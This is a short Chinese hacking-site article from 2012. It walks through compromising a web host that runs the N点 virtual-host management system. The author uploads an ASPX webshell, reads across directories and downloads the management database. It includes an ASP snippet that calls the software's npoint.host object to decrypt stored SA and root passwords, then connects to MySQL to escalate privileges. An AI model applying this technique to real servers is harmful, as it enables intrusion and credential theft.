热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

N点虚拟机管理系统提权实例

发布时间:2012-01-11 17:33文章来源:网络文章作者:秩名 点击次数:
摘要:N点虚拟机管理系统提权实例 为保留被检测网址的隐私 局部会有马赛克 嘻嘻 目标方该虚拟主机支持 ASP、。NET、PHP 传个ASPX大马,能列IIS 找了找,分配的权限不是很死,还能跨目录,发现虚拟机的管理目录 N点虚拟机,翻了翻目录里的东西,找到了 他的数据库。...

N点虚拟机管理系统提权实例 …为保留被检测网址的隐私 局部会有马赛克 嘻嘻

目标方该虚拟主机支持
ASP、。NET、PHP
传个ASPX大马,能列IIS

找了找,分配的权限不是很死,还能跨目录,发现虚拟机的管理目录

N点虚拟机,翻了翻目录里的东西,找到了 他的数据库。下载看了看,帐号密码加密的


有SA有ROOT,就是加密的。
<!–#include file=”conn.asp” –>
<!–#include file=”siteinfo.asp” –>
<!–#include file=”char.asp” –>
<%
set iishost=server.CreateObject(“npoint.host”)
x=iishost.Eduserpassword(“RNTYQ@DLLDDNEKFLK@EKHHMCGBFCDDFEBKFNDM@MHKBIJIPDMJ@B”,0)
response.write x
%>
我想你们都能看得懂,不过必须放在程序的目录下。但没写入权限,也只能自己去下载一套程序。
然后安装 把文件放在INC目录下。inc/111.asp
先把密文替换
<!–#include file=”conn.asp” –>
<!–#include file=”siteinfo.asp” –>
<!–#include file=”char.asp” –>
<%
set iishost=server.CreateObject(“npoint.host”)
x=iishost.Eduserpassword(“LJDNI@OFHMOCBFKEAAINJOADHMNEKIODCHMONHMI@E “,0)
response.write x
%>

然后进行本机的N点虚拟机WEB 目录访问 http://127.0.0.1:8080/inc/111.asp
明文很成功的解出来了。
既然明文解出来了, 我们去连接看看 该文明是MYSQL,放个大马连接

成功连接,提权的大家都熟悉了吧!呵呵 文章到此结束

标签分类:

上一篇:linux嗅探工具Dsniff安装笔记
下一篇:wmic在内网渗透中的应用